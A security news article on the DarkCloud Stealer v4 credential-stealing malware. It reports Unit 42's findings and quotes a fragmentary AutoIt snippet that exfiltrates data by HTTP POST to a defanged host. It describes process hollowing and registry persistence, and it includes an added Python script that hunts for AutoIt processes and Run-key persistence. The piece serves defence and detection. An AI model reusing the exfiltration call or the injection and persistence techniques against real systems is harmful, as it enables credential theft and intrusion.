New DarkCloud Stealer Uses AutoIt to Evade Detection and Steal Login Credentials
DarkCloud Stealer v4 uses the AutoIt scripting language to steal sensitive information, targeting financial institutions, healthcare organizations and e-commerce platforms in Asia and Europe. It bypasses traditional security detection through obfuscation and process injection and has already led to the compromise of more than 120,000 accounts. 2025-5-15 14:15:51 Author: cybersecuritynews.com

A new variant of the DarkCloud information-stealing malware has emerged, leveraging the AutoIt scripting language to bypass security tools and harvest sensitive credentials from infected systems.

Dubbed DarkCloud Stealer v4, the malware has targeted financial institutions, healthcare organizations, and e-commerce platforms across Asia and Europe since its initial detection in March 2025.

Security experts warn that its novel use of legacy tools and obfuscation techniques poses significant challenges for traditional detection methods.

According to researchers at Palo Alto Networks’ Unit 42 threat intelligence team, DarkCloud v4 exploits AutoIt’s flexible scripting capabilities to compile malicious payloads into standalone executables.

These executables mimic legitimate software processes, enabling the malware to evade heuristic analysis and sandboxing.

Attack vectors include phishing campaigns disguised as invoice alerts, malicious advertising redirects, and fake software updates for popular productivity tools like Slack and Zoom.

Once executed, the stealer extracts browser cookies, autofill data, and two-factor authentication (2FA) tokens, which are exfiltrated to attacker-controlled servers via encrypted HTTPS channels.

Researchers at Palo Alto Networks identified that the malware’s impact has been severe: breaches linked to DarkCloud v4 have already compromised over 120,000 corporate and individual accounts, with stolen credentials sold on darknet markets.

Its modular design allows operators to dynamically update payloads, ensuring adaptability to new security measures.

AutoIt Scripting and Process Hollowing

DarkCloud v4’s core innovation lies in its use of AutoIt, a scripting language typically associated with administrative automation.

Infection chain (Source – Palo Alto Networks)

By compiling malicious scripts into lightweight executables, attackers evade signature-based detection.

For example, the malware embeds its payload within an AutoIt interpreter, which executes the script directly in memory:

#include   
$hSession = _WinHttpOpen()  
$hConnect = _WinHttpConnect($hSession, "malware[.]cc")  
$hRequest = _WinHttpSendRequest($hConnect, "POST", "/exfil",..., $sData)  

This script snippet demonstrates DarkCloud’s HTTP POST request to exfiltrate stolen data.

Palo Alto Networks analysts noted that the malware further obfuscates strings using Base64 and XOR encryption, while inserting “junk code” to confuse static analysis tools.

To persist undetected, DarkCloud employs process hollowing, injecting its code into legitimate processes like explorer.exe or svchost.exe.

The malware suspends the target process, replaces its memory with malicious code, and resumes execution, a technique captured in forensic memory dumps.

Additionally, it creates scheduled tasks and Registry entries (HKCU\Software\Microsoft\Windows\CurrentVersion\Run) to maintain persistence after system reboots.

Organizations are advised to monitor for unusual AutoIt-related processes, particularly those spawning network connections to unrecognized domains.

Endpoint detection tools should prioritize behavioral analysis, such as unexpected process injections or rapid credential-access attempts.

Palo Alto Networks recommends enforcing application allowlisting and segmenting networks to limit lateral movement.

Security teams can hunt for compiled AutoIt executables (.a3x) or anomalous script-child processes originating from trusted applications.
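The hunting guidance above (AutoIt interpreters or compiled .a3x scripts spawned by trusted applications, AutoIt processes connecting to unrecognized domains, and Run-key persistence) can be expressed as a small detection over endpoint telemetry. The following is an added example written for this page, not code from the article or from Unit 42. The log lines are constructed to resemble Sysmon-style process-create (event 1), network-connect (event 3) and registry-set (event 13) records in a flat key="value" form; the field names, the trusted-parent list and the `update.corp.example` allowlist are assumptions, and the hostname `cdn-metrics.invalid` is a placeholder.

```python
import re
from typing import Dict, List, Tuple

# Indicators taken from the article's hunting guidance: the AutoIt interpreter,
# compiled .a3x scripts, and the HKCU Run key used for persistence.
AUTOIT_IMAGES = ("autoit3.exe", "autoit3_x64.exe")
AUTOIT_SCRIPT_EXT = ".a3x"
RUN_KEY_PREFIX = r"hkcu\software\microsoft\windows\currentversion\run"
# Assumption: the "trusted applications" whose AutoIt children a SOC would review.
TRUSTED_PARENTS = {"explorer.exe", "winword.exe", "excel.exe", "outlook.exe"}
# Assumption: destinations the organisation already recognises; anything else is flagged.
KNOWN_DESTINATIONS = {"update.corp.example"}

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed key="value" log line into a dict."""
    return dict(FIELD_RE.findall(line))


def references_autoit(text: str) -> bool:
    """True if a path or command line names the AutoIt interpreter or a compiled .a3x script."""
    t = text.lower()
    return any(img in t for img in AUTOIT_IMAGES) or AUTOIT_SCRIPT_EXT in t


def hunt(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (rule, subject, detail) findings for the three hunting indicators."""
    events = [parse_event(l) for l in lines if l.strip()]
    # Pass 1: collect PIDs of AutoIt-like processes from event 1 records, so a
    # network event logged before its process-create record is still attributed.
    autoit_pids = {
        e["ProcessId"] for e in events
        if e.get("EventID") == "1"
        and references_autoit(e.get("Image", "") + " " + e.get("CommandLine", ""))
    }
    findings: List[Tuple[str, str, str]] = []
    for e in events:
        eid = e.get("EventID")
        if eid == "1" and e["ProcessId"] in autoit_pids:
            parent = e.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
            if parent in TRUSTED_PARENTS:
                findings.append(("autoit_spawned_by_trusted_app", e["ProcessId"], parent))
        elif eid == "3" and e.get("ProcessId") in autoit_pids:
            dest = e.get("DestinationHostname", "").lower()
            if dest not in KNOWN_DESTINATIONS:
                findings.append(("autoit_unrecognised_destination", e["ProcessId"], dest))
        elif eid == "13":
            key = e.get("TargetObject", "")
            # Match values directly under ...\Run (not RunOnce) whose data points at AutoIt.
            if key.lower().startswith(RUN_KEY_PREFIX + "\\") and references_autoit(e.get("Details", "")):
                findings.append(("run_key_autoit_persistence", key.rsplit("\\", 1)[-1], e["Details"]))
    return findings


# Constructed sample telemetry: one AutoIt process launched by Word that beacons out and
# writes a Run key, next to a benign notepad.exe and a benign OneDrive Run entry.
SAMPLE_LOG = [
    r'EventID="1" ProcessId="4120" Image="C:\Users\alice\AppData\Roaming\svc\AutoIt3.exe" CommandLine="AutoIt3.exe C:\Users\alice\AppData\Roaming\svc\upd.a3x" ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"',
    r'EventID="1" ProcessId="5008" Image="C:\Windows\System32\notepad.exe" CommandLine="notepad.exe" ParentImage="C:\Windows\explorer.exe"',
    r'EventID="3" ProcessId="4120" Image="C:\Users\alice\AppData\Roaming\svc\AutoIt3.exe" DestinationHostname="cdn-metrics.invalid" DestinationPort="443"',
    r'EventID="3" ProcessId="5008" Image="C:\Windows\System32\notepad.exe" DestinationHostname="update.corp.example" DestinationPort="443"',
    r'EventID="13" ProcessId="4120" TargetObject="HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinSvcUpdate" Details="C:\Users\alice\AppData\Roaming\svc\AutoIt3.exe C:\Users\alice\AppData\Roaming\svc\upd.a3x"',
    r'EventID="13" ProcessId="5008" TargetObject="HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive" Details="C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"',
]

if __name__ == "__main__":
    for rule, subject, detail in hunt(SAMPLE_LOG):
        print(f"{rule}: {subject} -> {detail}")
```

The two-pass design matters in practice: a process's first outbound connection is often logged within milliseconds of its creation, and collectors do not guarantee ordering, so attributing network events only after all process-create records are known avoids missing the very beacon the article says to watch for. The `.a3x` check also catches the common case where the interpreter has been renamed but the compiled script keeps its extension.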

For now, vigilance against socially engineered triggers remains critical to disrupting this stealthy threat.

Source: https://cybersecuritynews.com/new-darkcloud-stealer-uses-autoit/